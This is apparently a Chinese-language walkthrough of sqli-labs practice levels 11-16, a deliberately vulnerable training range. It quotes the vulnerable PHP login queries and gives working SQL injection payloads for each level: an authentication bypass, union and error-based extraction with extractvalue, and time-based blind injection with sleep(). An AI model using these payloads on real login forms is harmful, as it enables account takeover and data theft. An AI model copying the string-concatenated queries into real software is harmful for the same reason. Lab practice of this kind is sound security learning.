靶场练习-Sqli-labs通关记录(post型)(11-16关)
0x00 实验环境
本地:Win 10
靶场:sqli-labs(共65关,每日一关)
0x02 通关记录
简介:一天一关!
(11)第十一关:
首先看到是个登录框,就平常的超级多的登录页面,我们从来没有思考过它会不会存在注入:
再看看源码,这句话的意思是在数据库中查询user与password,就正常的登录,查到账号密码就登录成功的那种:
// connectivity @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
是存在admin/admin这个账号及密码的,那如果我们不知道密码,闭合了账号后面的密码,就能成功的无需密码进行登录了,从源码可以知道直接输入admin'#,就能闭合这句话,无需密码就可以登录成功,试试看:
同样登录成功:
就可以初步判定这里存在注入,当然,其实从报错也不难发现,输入 admin' and or 1# 这本来就是一句语法错误的查询:
然后我们可以开始手工注入查询语句:
admin' order by 3#
然后order by 2 ,发现回显正常:
判定只有2列,然后依次查询,因为这个都是直接查询成功的,不会回显结果,所以试试报错查询:
admin' union select 1,2#
admin' union select extractvalue(1,concat(0x7e,(select user()),0x7e)),1#
然后之后的大家都懂的!
(12)第十二关:
第12关与第11关唯一区别就是在用户那里添加了一个"):
// connectivity $uname='"'.$uname.'"'; $passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
因此闭合语句变成:
admin") union select extractvalue(1,concat(0x7e,(select user()),0x7e)),1#
(13)第十三关:
同理,13关的也是仅仅是变了个'):
// connectivity @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
admin') union select extractvalue(1,concat(0x7e,(select user()),0x7e)),1#
(14)第十四关:
// connectivity $uname='"'.$uname.'"'; $passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
这个也是一样的,仅仅是多了一个"
因此闭合语句为:
admin" union select extractvalue(1,concat(0x7e,(select user()),0x7e)),1#
(15)第十五关:
第15关一样的,就是闭合语句的问题,这一关居然没报错了,那就试试延时注入:
// connectivity @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
admin' union select extractvalue(1,concat(0x7e,(select user()),0x7e)),1#
admin' and If(ascii(substr(database(),1,1))=111,1,sleep(7))#
错的数据库ascii码会有11秒,正确的应该是会有4秒:
发现结果确实如此!
(16)第十六关:
// connectivity $uname='"'.$uname.'"'; $passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
使用的"与)进行拼接,千万别看漏了!!!其实还是可以尝试延时注入,主要是报错不知道回显不回显。尝试后发现并不回显,因此试试延时注入:
admin") union select extractvalue(1,concat(0x7e,(select user()),0x7e)),1#
admin") and If(ascii(substr(database(),1,1))=111,1,sleep(7))#
admin") and if(ascii(substr(database(),1,1))=115,1,sleep(7))#